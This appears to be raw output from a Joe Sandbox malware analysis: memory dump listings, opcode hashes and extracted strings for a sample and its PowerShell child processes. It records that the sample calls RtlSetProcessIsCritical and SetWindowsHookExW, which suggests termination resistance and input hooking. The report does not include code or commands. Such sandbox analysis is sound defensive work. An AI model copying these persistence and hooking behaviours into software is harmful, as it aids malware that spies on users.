                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd

                                                    Control-flow Graph (calls RtlSetProcessIsCritical)

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess

                                                    Control-flow Graph (calls SetWindowsHookExW)

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759441334.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1758583044.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b79d000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759441334.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759441334.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759441334.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Similarity
                                                    • String ID: K_^$K_^$K_^$K_^
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Similarity
                                                    • String ID: K_^4$K_^7$K_^F$K_^J
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1861181441.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1859440965.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b76d000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1861181441.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1861181441.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07ea2650f15046fe3328d01e824162d753f1a85d63245fc9311fc687fb612a9b
                                                    • Instruction ID: 35c7e5b8e5a23de32d8f3e95b4894f616edace00bfde92fd7aeda5bfaeb16123
                                                    • Opcode Fuzzy Hash: 07ea2650f15046fe3328d01e824162d753f1a85d63245fc9311fc687fb612a9b
                                                    • Instruction Fuzzy Hash: FBF0BE32A8E5498FD7A8EA9CE0609A873E0FF0532070600BAE05DCB1A7CA25BC80C740
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1861181441.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 213a7bef4350c3f1bee2949e225e7fce9f90476923c174b99f125c2ca0013e85
                                                    • Instruction ID: 2bd4b7452e8ca639556a101ba233e37e207cd3d88c8fb42445df63553e6ec566
                                                    • Opcode Fuzzy Hash: 213a7bef4350c3f1bee2949e225e7fce9f90476923c174b99f125c2ca0013e85
                                                    • Instruction Fuzzy Hash: B1E01A35909A4D8FCB55EF18C85A8E97BA0FF68201B01429BE81DC7161EB719A58CBC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^4$N_^5$N_^@$N_^N$N_^U$N_^Y
                                                    • API String ID: 0-3838031992
                                                    • Opcode ID: a392f3302fbb25d507c61bbea77a140a6f0c9d6f9604de596c2796eb31889d56
                                                    • Instruction ID: 83bbf1f93b7a629c3e76d53dd781bb15c7523474e495e31b860c6ae041f0fd07
                                                    • Opcode Fuzzy Hash: a392f3302fbb25d507c61bbea77a140a6f0c9d6f9604de596c2796eb31889d56
                                                    • Instruction Fuzzy Hash: 3931E2A7B089364B831A76BCBD656E86744DF9437A34502F7D3A9CF193DC24608B87C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^$N_^$N_^$N_^$N_^
                                                    • API String ID: 0-1162251571
                                                    • Opcode ID: 146d961eed70f51233c92ac6a838d5b8f472c8829c5e64ad5657f8ba79b138b9
                                                    • Instruction ID: 7434351049173d53d9ce47226c1e13a6a9b08405790388154a102f990bd31ab8
                                                    • Opcode Fuzzy Hash: 146d961eed70f51233c92ac6a838d5b8f472c8829c5e64ad5657f8ba79b138b9
                                                    • Instruction Fuzzy Hash: FE5173A2E0FAD75BF76647A94CB54946FA0EF1669470E02F3C1F98B0E3ED2429034243
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6337f3cb908f5669fd4e0d68e41bf719897082e57cffa7a952616eea766cbc40
                                                    • Instruction ID: bfada23473d55a737df4c3853e9bbfb7f1e303345ad20cd1da6ffd5fb0f50930
                                                    • Opcode Fuzzy Hash: 6337f3cb908f5669fd4e0d68e41bf719897082e57cffa7a952616eea766cbc40
                                                    • Instruction Fuzzy Hash: 33D18070A08A4D8FDF99DF58C455AA9BBE1FF68300F15426AD41DD72A5CB34E881CBC1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9047dd271a9ca5413dad235c878a86d1ca3bdc0e250e37b45801e092311a0f88
                                                    • Instruction ID: 83071842fab17f5ed80ff5e8854200b8186a7bbead01dc9872dad61d972285b3
                                                    • Opcode Fuzzy Hash: 9047dd271a9ca5413dad235c878a86d1ca3bdc0e250e37b45801e092311a0f88
                                                    • Instruction Fuzzy Hash: 89D15672B1FBCD1FEBA597A858645B57BA1EF52314B0901FED89DC70E3DA18A801C341
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05faeb172e242b9ac57c815315d28e821ac041adc7628084584d23d6c10b3405
                                                    • Instruction ID: 3751d91d22f55a81ac77eda1d7482f1bc1327666ed2898235e3ed00ddd650130
                                                    • Opcode Fuzzy Hash: 05faeb172e242b9ac57c815315d28e821ac041adc7628084584d23d6c10b3405
                                                    • Instruction Fuzzy Hash: E111D36690EBCD4FD7639B2888291947FB0EF26210B0A00FBD498CB0F3D92859088392
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be92401c84b4b61d0e9885a14d7294486e9cb09ef06f363ad356d3130b72901c
                                                    • Instruction ID: b6604fdbd6631c066408eec5ce522fc99fe0cf6a50f7cdad489ca5a6ba7fe7a9
                                                    • Opcode Fuzzy Hash: be92401c84b4b61d0e9885a14d7294486e9cb09ef06f363ad356d3130b72901c
                                                    • Instruction Fuzzy Hash: E1F0E275808A8C4FDB61DF1888191A47FE0FF29301B0101ABE40DC71A1EB74D914C782
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ea7859f8df7750894c43586c2e9a0db30df8b43a3cbe4b8a6d95986341eb43d
                                                    • Instruction ID: 2653f8b4ea84a39e7fc71fc07ed8a02b2cdf188f1b32d0b6c34dfdf0b37affcb
                                                    • Opcode Fuzzy Hash: 9ea7859f8df7750894c43586c2e9a0db30df8b43a3cbe4b8a6d95986341eb43d
                                                    • Instruction Fuzzy Hash: D5516C32B5EA4A1FE7E9C6AC542167477D1DF65210F1940BEC45DC72EBDE14EC058341
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 913a3c641de1e10b8a2f80e83a9a606f7ccd2daa5293500e759638a4e6608136
                                                    • Instruction ID: 80fc93134f3d9f405b2a4d329c5a19875d99157db108bc8afef4188fe36c5306
                                                    • Opcode Fuzzy Hash: 913a3c641de1e10b8a2f80e83a9a606f7ccd2daa5293500e759638a4e6608136
                                                    • Instruction Fuzzy Hash: 4F414932B5EA495FEBE9DAAC54306B477D1EF40720B0900BED45DC72ABEA64BD018381
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3cc96412a3a67130efd15da709c4b8741d5b0a787f7a7203bd9b0ec81ce9683
                                                    • Instruction ID: 47cbea213db54878c2268118c9848fe6c69aebb1fb44307d1475dfc954b5707a
                                                    • Opcode Fuzzy Hash: b3cc96412a3a67130efd15da709c4b8741d5b0a787f7a7203bd9b0ec81ce9683
                                                    • Instruction Fuzzy Hash: 8C310971A1DF4C8FDB589F5CA84A6A97BE0FB99310F00412FE459D3252DA70B855CBC2
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2023101383.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b76d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67f725f9020e2538a7647f013201f3707874916675d577a8b5ed2d052e272fb2
                                                    • Instruction ID: 52a1e68d9544cd53745480f29d7ce6f1c72ea2d61e758ffdc488859f8168c9a6
                                                    • Opcode Fuzzy Hash: 67f725f9020e2538a7647f013201f3707874916675d577a8b5ed2d052e272fb2
                                                    • Instruction Fuzzy Hash: 1641287040EBC48FE7569B3998559523FF0EF56220B1606EFD088CB1B3D629A846C7A3
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0346c93ef32b88747172b233935408e21b8a4bcca5caec257584b5dfba685a53
                                                    • Instruction ID: 1bcf4fb34089567392b52694da7a66c35b7ed7da045fa0a64a794d425d25b468
                                                    • Opcode Fuzzy Hash: 0346c93ef32b88747172b233935408e21b8a4bcca5caec257584b5dfba685a53
                                                    • Instruction Fuzzy Hash: 4021F622B6F98A2FE7F9CA98446227467C1EF71210B5A40BDD85DC72FACE14EC048341
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf231c0704d1450deb44d7c24cdb19c97913708483359930b386e5c0db91a23d
                                                    • Instruction ID: d9f04957864981a37d98ce0e39a7a11c31072ea978200924c66ff838e5393ce9
                                                    • Opcode Fuzzy Hash: bf231c0704d1450deb44d7c24cdb19c97913708483359930b386e5c0db91a23d
                                                    • Instruction Fuzzy Hash: 0921063090DB4C8FDB59DBAC984A6E97BE0EB96321F04416BD048C31A6DA74A406CB92
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 292dc38a073d4dc8f76923a8b44134891d4c9b7fefb2f0494bbc186130521eb3
                                                    • Instruction ID: 4b3c0864fa7f932afe5f8dd7fdabfbe25325def8b192096fa4ce55ede3abf9e6
                                                    • Opcode Fuzzy Hash: 292dc38a073d4dc8f76923a8b44134891d4c9b7fefb2f0494bbc186130521eb3
                                                    • Instruction Fuzzy Hash: 68110632B9F5895FE7F4DB98947467877D0EF4021074A00BED85DC72BADA69BC008341
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^$N_^$N_^$N_^
                                                    • API String ID: 0-3900292545
                                                    • Opcode ID: 7fe091fc42f9defadceeeb4ec95ac9c1c1840ad96cba640769eef50481e89f1a
                                                    • Instruction ID: eaa362a5be4eae2c1b7a6c0159425dd4597290c045f2352f81b9c9184ef573b5
                                                    • Opcode Fuzzy Hash: 7fe091fc42f9defadceeeb4ec95ac9c1c1840ad96cba640769eef50481e89f1a
                                                    • Instruction Fuzzy Hash: 934184A3A0FAD65FE76647698C750957FA0EF1626470A02F7C1E48B0E3ED28250B8353
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^4$N_^7$N_^F$N_^J
                                                    • API String ID: 0-3508309026
                                                    • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                    • Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
                                                    • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                    • Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: X7)!
                                                    • API String ID: 0-116819185
                                                    • Opcode ID: 82e34b616c2070d8460f758bbbbea860ee7603934c1d2e9d26db24d91acfc082
                                                    • Instruction ID: 3501a9b12acb07052ddedb87129f41798ffed64be801d7fafea1e723c924ec95
                                                    • Opcode Fuzzy Hash: 82e34b616c2070d8460f758bbbbea860ee7603934c1d2e9d26db24d91acfc082
                                                    • Instruction Fuzzy Hash: 9FD14532A1FBCD9FEBA5A7A858645B57BE1EF56210B0901FED48CC70E3DA18A905C341
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f24a0c8fa8dbd59725d7d0afba24db829a201d20c535a9c18b573a44c41164f
                                                    • Instruction ID: 3e4a6a4741e827b7307e2e13f554a7f913cf109b9aecd3087a7c777018b6c3de
                                                    • Opcode Fuzzy Hash: 7f24a0c8fa8dbd59725d7d0afba24db829a201d20c535a9c18b573a44c41164f
                                                    • Instruction Fuzzy Hash: C5216D6A90FBD94FC7179B385C790D47FB0EE1721470A01E7D089CB0B3D91959498792
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74657e8321a3025c48d955144bff510b06f3e04efbba8b06da34d83be07a262a
                                                    • Instruction ID: 1516c7993185fb5bda34851451930ad45a202a3b1a318f4d3c44a08286974ba9
                                                    • Opcode Fuzzy Hash: 74657e8321a3025c48d955144bff510b06f3e04efbba8b06da34d83be07a262a
                                                    • Instruction Fuzzy Hash: E5F0C87590D6CDCFDB529F5848291E47FE0FF2A200B0501EBD449C7071DA249A54C782
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc75d07d87874de7a555064ad420f300917556ad6f998aed24817a0670e1ecbc
                                                    • Instruction ID: a39876ca7717fbb04ad3a4afe01d3a168ec14f35ab36195ab47d9ed3b0934179
                                                    • Opcode Fuzzy Hash: bc75d07d87874de7a555064ad420f300917556ad6f998aed24817a0670e1ecbc
                                                    • Instruction Fuzzy Hash: 46515A32F1EA4A9FEBA9DA9C542267477D1EFA5220B1A40BFC05DC72E7DE14EC058341
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d583de327159a6f47a76ecf205f3e026d51a1739292a8a28a209b18297325769
                                                    • Instruction ID: 89c77e460ec02c5fb0f8b031b2f2090177bf2a326ffe1bd0e9178cf833281e17
                                                    • Opcode Fuzzy Hash: d583de327159a6f47a76ecf205f3e026d51a1739292a8a28a209b18297325769
                                                    • Instruction Fuzzy Hash: 25413932B1EA499FEBB9D6AC5431AB477D1EF40720B0901BFD05DC72A7EA15AD018381
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b81abc87f6dcd15b8ff17ccbd1fbfd4f4a2d889658d9446c5933593508b7085
                                                    • Instruction ID: 68665cc5a9281e24f9dfe1583605e4d2554fc5b024ac84a86a11874b23161ce2
                                                    • Opcode Fuzzy Hash: 6b81abc87f6dcd15b8ff17ccbd1fbfd4f4a2d889658d9446c5933593508b7085
                                                    • Instruction Fuzzy Hash: 1041267190EB889FDB19DF5C9C0A6A97FE0EB59310F04416FD099D3293CA24B915CBC2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2230467712.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b77d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5f7e0668d011251f5315b08cd7147c0c2b50c6b4b07a77405f4e7972c09c6d5
                                                    • Instruction ID: 391230bec96ab6f6e9cbd8e3ba00ee9c950b03e6882741fe07a1e164d4c7428e
                                                    • Opcode Fuzzy Hash: b5f7e0668d011251f5315b08cd7147c0c2b50c6b4b07a77405f4e7972c09c6d5
                                                    • Instruction Fuzzy Hash: 2D41177150EBC44FE766DB2898919523FF4EF57320B1A06DFD088CB1B3D629A846C792
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3d8a446e1513338aec5d8b77172002047c28fe5707f82f8f044c7fa732ec12b
